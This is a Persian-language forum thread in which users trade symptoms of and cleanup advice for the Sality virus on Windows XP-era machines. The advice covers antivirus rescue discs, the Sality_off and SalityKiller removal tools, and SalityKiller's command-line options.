شما ابتدا آنتیت رو از کار بنداز، فایلهات رو از فلش بریز رو کامپیوتر، برو به تاپیک Disk Write PRotected و فلشت رو درست کن.

حالا با کسپر یا انتی هایی که میتونن برات Clean کنن پوشه اطلاعاته فلشت رو Scan کن.


من ویروس win32/chir.b.worm و sality همزمان به هم روزگارم رو سیاه کردند با آنتی ویروس avira و nod و روشهایی که در تاپیک آمده میشه گفت ویروس رو پاک کردم ولی خیلی از فایلهای exe حذف شدند آیا میشه با نرم افزارهای ریکاوری اونها رو برگردوند یا نه در مورد این ویروس win32/chir.b.worm مثل اینکه اسم دیگش nimda هم کمک کنید ممنون میشم

بله اینا همه شون ویروسهای مشهوری هستند.
قبلاگفته بودم که بدترین حالت ممکن وقتیه که سالیتی با یه ویروسه دیگه یا کرم خودش رو قاطی کنه، اونوقته که فاجعه به بار میاره!!! همراه کرم تو کل شبکه پخش میشه!!!

شما دیر اومدید!!

راه حل اینجوریه برای اینجور مواقع:
ابتدا باید کرم رو از تو حافظه خارج کنی بعد هم با روش گفته شده در پست 1 سالیتی رو Clean کنی بعد هم باید باید با استفاده از یه انتی معمولی کرم رو بکشی.

شما از getDataBak استفاده کن.

موفق باشید.:31:

salam bat tashakor

picher_s جان
چرا در پست اول راه حل اول نرم افزار trend یا همون پی سیسیلین بعضی از ویروسها را پاک نمیکند و بدون تغییر رها میکند در مورد لینوکس هم که قبلا سوال کردم جواب بدید ممنون میشم

من تا ديروز كه ويندوزم رو دوباره نصب كردم مشكل Sality داشتم و خيلي از فايل هاي EXE منو قرباني كرده بود. آنتي ويروس Nod32 V4.0 كه تا آخرين لحظه آپديت بود تقريباً همه اونا رو آلوده تشخيص ميداد ولي نميتونست Clean كنه و همش داشت هشدار ميداد و من هم كلافه شده بودم تصميم گرفتم دوباره ويندوز رو نصب كنم.

در هنگام نصب ويندوز درايو ويندوزم رو به كلي حذف كردم و دوباره فرمتش كردم. بعد از نصب كامل ويندوز بدون اينكه به درايوي وارد بشم آنتي ويروس Nod32 V4.0 رو نصب كردم و آپديت كردم و گذاشتم تا يه دور به طور كامل سيستم رو اسكن كنه.

در كمال تعجب تمام فايل هايي كه قبلاً همين آنتي ويروس آلوده تشخيص داده بود رو سالم تشخيص داد.

سئوال : آيا ممكنه با از بين رفتن مبدأ اين ويروس (win32.Sality.Nao) فايل هاي آلوده هم پاك بشن؟ يعني اگر من همون فايل‌ها رو به كامپيوتر سالم انتقال بدم ويروسي تشخيص داده نشه؟

الآن تكليف من چيه؟ آيا سيستمم سالمه يا ويروس به طور نهفته وجود داره ولي آنتي ويروس از نشان دادنش عاجزه؟

درود

بهترین راه فرستادن یک فایل به سایته Virustotal.com می باشد و ببینید که میگه ویروس داره یا نه!!!


چرا در پست اول راه حل اول نرم افزار trend یا همون پی سیسیلین بعضی از ویروسها را پاک نمیکند و بدون تغییر رها میکند در مورد لینوکس هم که قبلا سوال کردم جواب بدید ممنون میشم

ببین وقتی ویروس تو حافظه باشه پاک کردنش سخته برای آنتی ویروسا!!! چون ایتدا باید از تو حافظه بیرون بره!!!

موفق باشید.

من رفتم سیستم یه شرکتو درست کنم دیدم سالیتی داره
از اونجایی که این ویروس اجازه ی نصب آنتی ویروس نمیده
از سی دی بوت کسپرسکای استفاده کردم
27000 تا فایل exe آلوده شده بود که اکثرا تو system volume information بودن:18::18:
خوبی کسپرسکای نسبت به بقیه آنتی ویروسا تو پاک کردن این ویروس اینه که ویروسو از فایل کاربر جدا میکنه
و کاربر میتونه دوباره از فایلش استفاده کنه
توجه! قبل از اسکن حتما system restore رو غیر فعال کنید و تمام محتویات system vilume information همه ی درایو ها رو پاک کنید:20::20:

من رفتم سیستم یه شرکتو درست کنم دیدم سالیتی داره
از اونجایی که این ویروس اجازه ی نصب آنتی ویروس نمیده
از سی دی بوت کسپرسکای استفاده کردم
:18::18:
خوبی کسپرسکای نسبت به بقیه آنتی ویروسا تو پاک کردن این ویروس اینه که ویروسو از فایل کاربر جدا میکنه
و کاربر میتونه دوباره از فایلش استفاده کنه
27000 تا فایل exe آلوده شده بود که اکثرا تو system volume information بودن توجه! قبل از اسکن حتما system restore رو غیر فعال کنید و تمام محتویات system vilume information همه ی درایو ها رو پاک کنید:20::20:

درود

الان دیگه همه آنتی ها میشناسن و راحت هم Repair میکنن.

مهم هم خارج شدن ویروس از تو حافظه است. که با Sality Off , salityKiller که در پست 1 معرفی شدن شما به راحتی میتونید این کار ها روانجام بدین.

پس به طور خلاصه شما اگه از بوت آویرا هم استفاده کرده بودید به همین نتیجه میرسیدید.

اقا من اخرین نسخه بروز کاسپر رو روی اکس پی دارم مدام گیر میده که ویروس Virus.Win32.Sality.s در فایل
C:\WINDOWS\system32\wmdrtc32.dll
هست و گزینه skip میاد و دیلیت نمیشه

درود رفیق.

نتونستم عکست رو لود کنم یه جای دیگه بزار.

ببین حجمش اگه 40,960 هست پس درسته(برگرفته از
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اگه نیست با cd آنتی ویروسه بوته کسپر براحتی میتونی از بینش ببری ها!!!

منتظرم.

درود رفیق.

نتونستم عکست رو لود کنم یه جای دیگه بزار.

ببین حجمش اگه 40,960 هست پس درسته(برگرفته از
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیداگه نیست با cd آنتی ویروسه بوته کسپر براحتی میتونی از بینش ببری ها!!!

منتظرم.


سلام.

ممنون از تاپیک خوب و مفیدتون. :11:

دوستان گلم؛ تا جایی که من اطلاع دارم، این ویروس یک پروسه ای در ویندوز ایجاد میکننه که اگر شما با آنتی ویروس Bootable اونو پاکش کنید، هنگام بالا اومدن ویندوز، اون پروسه دوباره باعث تولید مجدد ویروس Sality میشه.

در سیستم هایی که بد جوری به این ویروس آلوده شدند و آنتی ویروس از کار افتاده و بقیه برنامه ها هم لطمه خوردند، راه زیر میتونه 100 در 100 موثر باشه :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشید :11:

ممنون رفیق.


تا جایی که من اطلاع دارم، این ویروس یک پروسه ای در ویندوز ایجاد میکننه که اگر شما با آنتی ویروس Bootable اونو پاکش کنید، هنگام بالا اومدن ویندوز، اون پروسه دوباره باعث تولید مجدد ویروس Sality میشه.

مشکل اینه که خودش رو به عنوان یه thread از پروسزهای مهم معرفی میکنه!!! کاش یه پرسز جدا بود مثله Jeefo!!!



پاک کردن Sality توسط Kaspersky


اين طبيعيه كه ريجستري باز نشه. حتي شما نميتونيد از حالت Safe Mode استفاده كنيد. اين مكانسيم اثر Sality هست.

اگه دقيقا و مرحله به مرحله موارد گفته شده رو اجرا كنيد به نتيجه خواهيد رسيد.

قبل از هر چيز فايل زير رو دانلود كنيد.

کد:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
این فایل برای از کار انداختن پروسه های ویروس بکارمیره و تا زمانیکه فعال باشه ، ویروس قادر به فعالیت نیست.

در واقع این فایل ویروس رو موقتا غیرفعال میکنه تا شما بتونید آنتی ویروس قوی نصب کنید یا سیستم رو کاملا اسکن کنید. پس دقت كنيد كه تا مراحل زير رو اجرا نكنيد، هيچ آنتي ويروسي عمل نخواهد كرد.

فایل دانلود شده را اکستراکت کرده و فایل Sality_off.exe را اجرا کنید و صبر کنید تا اسکن آن کامل شود.
← بر روی پوشه Startup در مسیر Start --> All programs کلیک راست کرده و Open کنید

← حال بر روی فضای خالی پوشه ، کلیک راست کنید و از منوی New --> Shortcut یک کلید میانبر ایجاد کنید

← پنجره ایجاد کلید میانبر بوجود آمده و با استفاده از گزینه Browse آدرس فایل Sality_off.exe را وارد کنید

←در آخر آدرس فایل ، عبارت m- را با یک فاصله وارد کنید یعنی آدرس فایل باید اینگونه شودC:\Sality_off.exe -m

←سپس گزینه Next را انتخاب کرده و در آخر OK کنید

← فایل Sality_off.exe را اجرا کنید
(به ياد داشته باشيد كه فقط يك بار ميتونيد از اين فايل استفاده كنيد. يعني اگه عمليات تون قطع شد يا نصفه موند، بايد دوباره فايل رو اكستركت كنيد و از نو كار رو شروع كنيد و فايل قبلي كه نصفه نيمه مونده به درد نميخوره)

نكات خيلي خيلي مهم
بهتره براي اين ويروس از كسپر 2009 و به بالا استفاده كنيد.
اگه قبلا كسپر رو نصب كرده ايد و كارنميكنه (و اينطوري بهتره كه قبلا نصب شده باشه) از استارت منو به پوشه KasperSky بريد و گزينه Modify , Repair Or Remove رو انتخاب كنيد و آنتي ويروس رو Repair كنيد.
به ياد داشته باشيد كه فايل Sality Off.exe پس از هر بار ريستارت شده سيستم اجزا خواهد شد. هرگز اون پنجره رو نبنديد تا دوباره ويروس شروع به فعاليت نكنه.
کسپرسکی را کاملا آپدیت کنید
با حداکثر قدرت کسپرسکی ، کل سیستم را اسکن کنید
(بهتره تيك هر دو گزينه Scan Technilogy رو برداريد. (البته فقط براي اين ويروس)
بعد از اينكه سيستم تون كاملا پاك شد، يادتون باشه كه بازم نبايد اون فايل رو ببنديد. آخرين مرحله حذف اين ويروس تعويض ويندوز به صورت فرمت كردن كامل درايوي هست كه ويندوز در اون هست.
البته برنامه salityKiller هم در كنار اينها به كار ميره و اگر Sality off.exe به تنهايي كار ساز نباشه بهتره اون رو هم استفاده کنید.در همون پست 1 ذکر گردیده :

روش دوم (کوتاه و مختصر):
حالا برای کامل کردن بحثمون به مسیر زیر برید فایل sality_off رو بردارید و اجرا کنید تا تمام خرابکاری هایی رو که سر فایلهای ویندوزتون خانم ویروس آورده repair کنه.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[/امروز دیدم که Sality Killer هم کسپر گذاشته.
یا از مسیر زیر دون کنید :
کد:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
به هر حال شما میتونید مستقیما بدون استفاده از TrendMicro و با Sality Killer هم اون از Exe هاتون Clean کنید.] موفق و پیروز باشید.

اینم برای ترمیم رجیستری شما
کد:
[FONT=Tahoma][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
با تشکر رفیق.

من یه مشکل حاد دارم
نود ویروس رو شناسایی میکنه و از رو فایل پاک میکنه ولی دو دقیقه بعد باز پیغام میاد ویروس داره
جالبه وقتی که اسکن کلی میزنم ویروس شناخته نمیشه ولی موقع کار با ویندور ویروس رو فایل های Exe میچسبه از کجا نمیدونم
چطوری ممکنه که انتی ویروس ویروس روی فایل ها رو تشخیص میده ولی موقع اسکن کلی چیزی نشون نمیده ?
این ویروس رو چطوری ناپدید کنم ؟


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

درود

SalityKiller که در پست 1 معرفی شده.

آقایون(یا احیانا خانوما!!!) من فقط هر فایل PDF که باز میکنم خودش بسته میشه وگرنه هیچکدوم از این مشکلایی که گفتید ندارم!!
میگن سالیتی گرفتی!!!درسته؟؟؟یعنی بدبخت شدیم رفت!!!!

آقایون(یا احیانا خانوما!!!) من فقط هر فایل PDF که باز میکنم خودش بسته میشه وگرنه هیچکدوم از این مشکلایی که گفتید ندارم!!
میگن سالیتی گرفتی!!!درسته؟؟؟یعنی بدبخت شدیم رفت!!!!


نه بابا :18:

شما اگه آنتی ویروس خوب و آپدیت داشته باشید هیچ مشکلی نیست.


شما java و Adobe Flash Player برای کامپیوتر رو نصب کن بعد ببین هنوز مشکل داری یانه.

اگه نهایتا بازم نشد از این برنامه برای پی دی اف استفاده کن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

با سلام
من مدتی که دچار این ویروس شدم ولی نمدونم
که این ویروس از چه طریقی وارد کامپیوترم شده اگر ممکن است راهنمای کنید.ضمنا این ویروس نمیگذاره با نسخه بوت کاسپر ویا اویرا سیستم اسکن کنم

درود

این امکان نداره!!! مشکل از جایی دیگه است.

ممکنه به یه ویروسه دیگه چسبیده باشه و توی کامپیوتر شما اومده باشه.

1- combofix

2- salityKiller در همون پست 1

پیروز باشید.

سیستم من نمیگذاره آنتی ویروس نصب بشه ، چه راهی وجود داره بدون نصب ویندوز جدید آنتی ویروس رو نصب کنم ؟ می خوام حتما آنتی ویروسم نود32 باشه ، آیا میشه از روی نود 32 یه آنتی ویروس بوت ساخت؟ لطفا کمک کنید

درود

شما میتونید از Cd بوت هر آنتی ویروسی استفاده کنید برای ویروسیابی.

سوال دومتون رو در بخش آنتی ویروسها قسمت نود بپرسید.

سلام
من این ویروسSality را در سیستمم داشتم با استفاده از روشی که در پست اول بود پاکش کردم
الان هم در سیستمم ویروس موجود نیست اما در هنگام بالا امدن این ارور را می دهد کسی می داند دلیلش چیست وچه راه حلی دارد؟؟
عکس از این ارور

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
با تشکر

سلام
من این ویروسSality را در سیستمم داشتم با استفاده از روشی که در پست اول بود پاکش کردم
الان هم در سیستمم ویروس موجود نیست اما در هنگام بالا امدن این ارور را می دهد کسی می داند دلیلش چیست وچه راه حلی دارد؟؟
عکس از این ارور

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبا تشکر

درود

عزیز این برنامه رو از تو استارت اپ ویندوزت بردار.

بعد هم repairش کن اگه برنامه این قابلیت رو داره.

با سلام به همه ی اساتید گرامی
آقا من یه سیستم دستم رسیده که مال دوستم هست و 3 سال پیش خریده و در این سه سالی که استفاده کرده گویا هیچ نوع آنتی ویروسی هم نصب نکرده و الان که یک برنامه مخرب تمام فایل های exe رو خراب کرده و اجازه ی نصب هیچ برنامه ای رو بهش نمی ده دوزاریش افتاده که سیستمش پر از برنامه lمخربه و به من هم میگفت هر فولدری که می رفته اتوماتیک یک new folder داخلش ایجاد میشد و فکر میکرد این خوبه که کامپیوترش اتوماتیک فولدر باز میکنه!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]بگذریم حالا سیستم رو آورده پیش من که براش کاری کنم (مثلا من استادم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بیرون نمیبره چون هاردش پر از عکسها و فیلم های خصوصیه. حالا من ابتدا خواستم یک آنتی ویروس روش نصب کنم که نشد ویروسه اجازه نمیده.کسپرسکی و نود و مک آفی رو هم امتحان کردم نمیذاره نصب کنم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]گویا خیلی خفنه!!! در حالت سیف مد هم نمیذاره بوت بشه!!آفرین به نویسندش!!
خواستم ویندوز عوض کنم ویروسه نذاشت[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا دو تا راه به نظرم میرسه یکی اینکه هاردشو در بیارم و به سیستم خودم ببندم و ویروسکشی کنم و دوم اینکه هاردشو از نو پارتیشن بندی کنم که بیچاره 100 گیگ عکس و آهنگ و فیلمش از بین میره!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا از اساتید چند تا سوال داشتم که امیدوارم بنده رو راهنمایی بفرمایند.
اول اینکه آیا اگرمن هاردشو به سیستمم ببندم امکان داره که تاکسپرسکی اینترنت سیکیوریتی آپدیت شده و اکتیو عزیزم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] بالا بیاد این ویروس ها همون بلایی که سر سیستم دوستم آورده رو سر سیستم من بیاره (فرض کنیم خطرناک ترین برنامه مخرب روش هست)؟؟؟؟ و میشه بعد اینکه سیستم من بالا اومد هاردشو به سیستم وصل کنم ؟ هاردش آسیب نمیبینه؟؟؟؟
و آیا به جز این دو راه دیگه ای هست که به ذهن من نمیرسه؟؟[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ضمنا من راه هایی که در مورد سالیتی گفتین رو امتحان کردم اما جواب نداد گویا سالیتی نیست؟؟!! هر فایل exe رو خراب میکنه ویندوز پیغام میده فایل exe شما خراب شده!!! در ضمن در صورت استفاده از سی دی بوت کسپر سیستم ریستارت میشه!!

با سلام به همه ی اساتید گرامی
آقا من یه سیستم دستم رسیده که مال دوستم هست و 3 سال پیش خریده و در این سه سالی که استفاده کرده گویا هیچ نوع آنتی ویروسی هم نصب نکرده و الان که یک برنامه مخرب تمام فایل های exe رو خراب کرده و اجازه ی نصب هیچ برنامه ای رو بهش نمی ده دوزاریش افتاده که سیستمش پر از برنامه lمخربه و به من هم میگفت هر فولدری که می رفته اتوماتیک یک new folder داخلش ایجاد میشد و فکر میکرد این خوبه که کامپیوترش اتوماتیک فولدر باز میکنه!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]بگذریم حالا سیستم رو آورده پیش من که براش کاری کنم (مثلا من استادم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بیرون نمیبره چون هاردش پر از عکسها و فیلم های خصوصیه. حالا من ابتدا خواستم یک آنتی ویروس روش نصب کنم که نشد ویروسه اجازه نمیده.کسپرسکی و نود و مک آفی رو هم امتحان کردم نمیذاره نصب کنم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]گویا خیلی خفنه!!! در حالت سیف مد هم نمیذاره بوت بشه!!آفرین به نویسندش!!
خواستم ویندوز عوض کنم ویروسه نذاشت[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا دو تا راه به نظرم میرسه یکی اینکه هاردشو در بیارم و به سیستم خودم ببندم و ویروسکشی کنم و دوم اینکه هاردشو از نو پارتیشن بندی کنم که بیچاره 100 گیگ عکس و آهنگ و فیلمش از بین میره!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا از اساتید چند تا سوال داشتم که امیدوارم بنده رو راهنمایی بفرمایند.
اول اینکه آیا اگرمن هاردشو به سیستمم ببندم امکان داره که تاکسپرسکی اینترنت سیکیوریتی آپدیت شده و اکتیو عزیزم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] بالا بیاد این ویروس ها همون بلایی که سر سیستم دوستم آورده رو سر سیستم من بیاره (فرض کنیم خطرناک ترین برنامه مخرب روش هست)؟؟؟؟ و میشه بعد اینکه سیستم من بالا اومد هاردشو به سیستم وصل کنم ؟ هاردش آسیب نمیبینه؟؟؟؟
و آیا به جز این دو راه دیگه ای هست که به ذهن من نمیرسه؟؟[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ضمنا من راه هایی که در مورد سالیتی گفتین رو امتحان کردم اما جواب نداد گویا سالیتی نیست؟؟!! هر فایل exe رو خراب میکنه ویندوز پیغام میده فایل exe شما خراب شده!!! در ضمن در صورت استفاده از سی دی بوت کسپر سیستم ریستارت میشه!!


سلام

ریستارت شدن هنگام استفاده از Rescue Disk کسپر ، جزء اثرات این ویروسه. حتی نمیتونید وارد Safe Mode بشید.

دوست عزیز، مشکل شما حاد شده.

از پست زیر برای پاک کردن ویروس استفاده کنید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید :11:

شما باید برای پاک کردن این ویروس از sality killer این ویروس رو شناسایی کنید بعد از آنتی ویروسهای bootable اسنفاده کنید
که وارد ویندوز نشید و از طریق بوت سیستم رو اسکن کنید و پاک کنید
اگر هم از آنتی ویروس استفاده کنید در محیط safe mode با آنتی ویروس اسکن کنید

با سلام به همه ی اساتید گرامی
آقا من یه سیستم دستم رسیده که مال دوستم هست و 3 سال پیش خریده و در این سه سالی که استفاده کرده گویا هیچ نوع آنتی ویروسی هم نصب نکرده و الان که یک برنامه مخرب تمام فایل های exe رو خراب کرده و اجازه ی نصب هیچ برنامه ای رو بهش نمی ده دوزاریش افتاده که سیستمش پر از برنامه lمخربه و به من هم میگفت هر فولدری که می رفته اتوماتیک یک new folder داخلش ایجاد میشد و فکر میکرد این خوبه که کامپیوترش اتوماتیک فولدر باز میکنه!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]بگذریم حالا سیستم رو آورده پیش من که براش کاری کنم (مثلا من استادم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بیرون نمیبره چون هاردش پر از عکسها و فیلم های خصوصیه. حالا من ابتدا خواستم یک آنتی ویروس روش نصب کنم که نشد ویروسه اجازه نمیده.کسپرسکی و نود و مک آفی رو هم امتحان کردم نمیذاره نصب کنم[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]گویا خیلی خفنه!!! در حالت سیف مد هم نمیذاره بوت بشه!!آفرین به نویسندش!!
خواستم ویندوز عوض کنم ویروسه نذاشت[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا دو تا راه به نظرم میرسه یکی اینکه هاردشو در بیارم و به سیستم خودم ببندم و ویروسکشی کنم و دوم اینکه هاردشو از نو پارتیشن بندی کنم که بیچاره 100 گیگ عکس و آهنگ و فیلمش از بین میره!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] حالا از اساتید چند تا سوال داشتم که امیدوارم بنده رو راهنمایی بفرمایند.
اول اینکه آیا اگرمن هاردشو به سیستمم ببندم امکان داره که تاکسپرسکی اینترنت سیکیوریتی آپدیت شده و اکتیو عزیزم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] بالا بیاد این ویروس ها همون بلایی که سر سیستم دوستم آورده رو سر سیستم من بیاره (فرض کنیم خطرناک ترین برنامه مخرب روش هست)؟؟؟؟ و میشه بعد اینکه سیستم من بالا اومد هاردشو به سیستم وصل کنم ؟ هاردش آسیب نمیبینه؟؟؟؟
و آیا به جز این دو راه دیگه ای هست که به ذهن من نمیرسه؟؟[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ضمنا من راه هایی که در مورد سالیتی گفتین رو امتحان کردم اما جواب نداد گویا سالیتی نیست؟؟!! هر فایل exe رو خراب میکنه ویندوز پیغام میده فایل exe شما خراب شده!!! در ضمن در صورت استفاده از سی دی بوت کسپر سیستم ریستارت میشه!!


سلام
دوست عزیز شما پستی که ایجاد کرده بودید را دوباره بخوانید من توضیح دادم به کدام تایپیک مراجعه کنید
منم مشکل شما را داشتم حل شد

tohidkh عزیز این سیستم دوستم دیگه کلا بالا نمیاد که من این سالیتی کیلر رو روش نصب کنم !!!! موقع شروع بعد از اینکه پنجره ویندوز میاد که نوشته microsoft windows xp زیرشم چند تا خط هی حرکت میکنن میاره و بعدش یه صفحه مشکی میاد و هیچ چیز دیگه ای نمیاد!!! من خودم تا حالا این صفحه رو ندیده بودم!!! ایییییی نمیدونم دیگه چکار کنم!!!!

tohidkh عزیز این سیستم دوستم دیگه کلا بالا نمیاد که من این سالیتی کیلر رو روش نصب کنم !!!! موقع شروع بعد از اینکه پنجره ویندوز میاد که نوشته microsoft windows xp زیرشم چند تا خط هی حرکت میکنن میاره و بعدش یه صفحه مشکی میاد و هیچ چیز دیگه ای نمیاد!!! من خودم تا حالا این صفحه رو ندیده بودم!!! ایییییی نمیدونم دیگه چکار کنم!!!!

سلام
دوست عزیز هاردش را به کیس خودت ویا هر کیس دیگری وصل کن بعد ان فایل را اجرا کن
زمانی که اجرا کردی چیزی نصب نمیشه فقط شروع یه اسکن می کنه
اونفایل sality_off را اجرا کن بعد فایل دومی را
این قسمت توضیح دوستمان را بخوان
روش دوم (کوتاه و مختصر):
حالا برای کامل کردن بحثمون به مسیر زیر برید فایل sality_off رو بردارید و اجرا کنید تا تمام خرابکاری هایی رو که سر فایلهای ویندوزتون خانم ویروس آورده repair کنه.
[font=Tahoma][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[/امروز دیدم که Sality Killer هم کسپر گذاشته.
یا از مسیر زیر دون کنید :

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید هر حال شما میتونید مستقیما بدون استفاده از TrendMicro و با Sality Killer هم اون از Exe هاتون Clean کنید.] موفق و پیروز باشید.

اینم برای ترمیم رجیستری شما

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
منم همین مشکل را داشتم حل شد

سلام دوستان من sality off و sality killer رو اجرا کردم ولی هنوزم این ویروسو دارم آنتی ویروسمم nod32 آپدیت شده است که ماشاله فقط فیالو پاک میکنه تا حالا چندتا از برنامه هام پاک شدن به همین خاطر کسی نمیتونه کمکی کنه؟؟؟
این پیغام نده : a variant of win32 sality virus

سلام دوستان من sality off و sality killer رو اجرا کردم ولی هنوزم این ویروسو دارم آنتی ویروسمم nod32 آپدیت شده است که ماشاله فقط فیالو پاک میکنه تا حالا چندتا از برنامه هام پاک شدن به همین خاطر کسی نمیتونه کمکی کنه؟؟؟
این پیغام نده : a variant of win32 sality virus
درود عزیز.

شما ابتدا آنتی ویروس نودتون رو پاک کنید.

سپس Sality Killer رو اجرا کنید.

حالا آویرا نصب کنید

اکنون اسکن کنید و rRepair رو انتخاب کنید.

حالا ویندوزتون رو با دستور SFC /scanow تعمبر کنید.

پیروز باشید.

سلام
کاملترین مطلب در مورد ویروسهای کامپیوتری و حذف و پاکسازی آنها خصوصا سالیتی sality.y sality.aa را در اینجا ببینید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بهترین و ایمن ترین روش برای پاک کردن ویروس سالیتی به این روش است:
1- با استفاده از نرم افزار FlashDisinfector تمام تغیراتی ویروس در رجیستری ویندوز را به حالت استاندارد در می آوریم (نکته: در صورت عدم بوت شدن ویندوز آنرا در SafeMode بوت می کنیم و در صورت عدم اجرای Safe mode باید یکبار سیستم ویندوز را Repair کنیم)
2- کاسپر اسکای انیترنت سکوریتی 2010 با هر آپدیتی (نه آنتی ویروس! کاسپر) را نصب می کنیم.
3- بلافاصله یکبار فول اسکن را اجرا می کنیم.
4- در صورت عدم آپدیت آنتی ویروس از طریق آدرس controlpanel\administrator tools/Service تمامی سرویس های مربوط به اینترنت و شبکه را ریست می کنیم.
دیگر سالیتی غیر فعال و در صورت اولین آپدیت از بین می رود

---------- Post added at 07:55 PM ---------- Previous post was at 07:50 PM ----------

ضمنا: Nod32 سالیتی را پیدا می کند ولی توانایی حدف کامل آن را نداشته و فقط به مدت محدودی غیر فعال می کند در صورت انقضا تاریخ رجیستر نود بلافاصله سالیتی فعالی می شود.
norton فقط در صورت آغاز فعالیت و یا در حال انتقال آن می تواند آنرا از بین می برد.

بهترین و ایمن ترین روش برای پاک کردن ویروس سالیتی به این روش است:
1- با استفاده از نرم افزار FlashDisinfector تمام تغیراتی ویروس در رجیستری ویندوز را به حالت استاندارد در می آوریم (نکته: در صورت عدم بوت شدن ویندوز آنرا در SafeMode بوت می کنیم و در صورت عدم اجرای Safe mode باید یکبار سیستم ویندوز را Repair کنیم)
2- کاسپر اسکای انیترنت سکوریتی 2010 با هر آپدیتی (نه آنتی ویروس! کاسپر) را نصب می کنیم.
3- بلافاصله یکبار فول اسکن را اجرا می کنیم.
4- در صورت عدم آپدیت آنتی ویروس از طریق آدرس controlpanel\administrator tools/Service تمامی سرویس های مربوط به اینترنت و شبکه را ریست می کنیم.
دیگر سالیتی غیر فعال و در صورت اولین آپدیت از بین می رود
ضمنا: Nod32 سالیتی را پیدا می کند ولی توانایی حدف کامل آن را نداشته و فقط به مدت محدودی غیر فعال می کند در صورت انقضا تاریخ رجیستر نود بلافاصله سالیتی فعالی می شود.
norton فقط در صورت آغاز فعالیت و یا در حال انتقال آن می تواند آنرا از بین می برد.


ممنون
ولی وقتی برنامه سالیتی اف
از خود سایت کسپر قابل دانلود هست نه نیاز به اپدیت کردن انتی ویروس نه نیاز به تعویض انتی ویروس داریم
در ضمن جهت اطلاع
سایتی به هیچ عنوان به صورت دستی غیر فعال نمیشه و کم کم به هر فایی با پسوند exe میچسبه و اونم الوده میکنه .

سلام به دوست عزيز picher_s ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

من رو ببخشيد كمي توي كامپيوتر ناشي هستم
كامپيوترم به ساليتي الوده شده. نورتون انتي ويروس هم روش نصب هست. روشي رو كه از اين تاپيك برداشت كردم براي از بين بردنش به ترتيب زير هست. ببينيد ايا درست ميگم؟

1- انتي ويروس نورتون كه روي سيستمم نصب هست رو ان اينستال كنم
2- فايل SalityKiller.zip ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])رو از از لينكش دانلود و بعداز اكستركت كردن اجرا ميكنم. ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])و اگر لازم شد سيستم رو ريستارت ميكنم.
3- فايل ساليتي كيلر رو در استارت اپ قرار ميدم.
4- Sality_RegKeys.zip ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) رو از لينكش دانلود و فايلهاي داخلش رو (به جز اونايي كه مربوط به اكس پي نيست) اجرا ميكنم.
5- فايل ساليتي كيلر رو با پارامترهاي زير اجرا ميكنم



Additional parameters to run SalityKiller.exe from command line:
-p <path> - scan a specific folder;
-n - scan network disks;
-r - scan flash drives, scan removable hard disks connected via USB and Fire Wire;
-y - close the window when the utility finishes;
-s - scan in "silent" mode (without opening console box);
-l <file_name> - write log to the file;
-v - detailed logging (must be used in combination with -l);
-x - restore possibility to view hidden and system files;
-a - disable autorun from any devices;
-j - restore the registry branch SafeBoot (if it is deleted, the PC will not be able to start up in Safe mode);
-m - monitoring mode to protect the system from getting infected;
-q - scan the system and then go to monitoring mode;
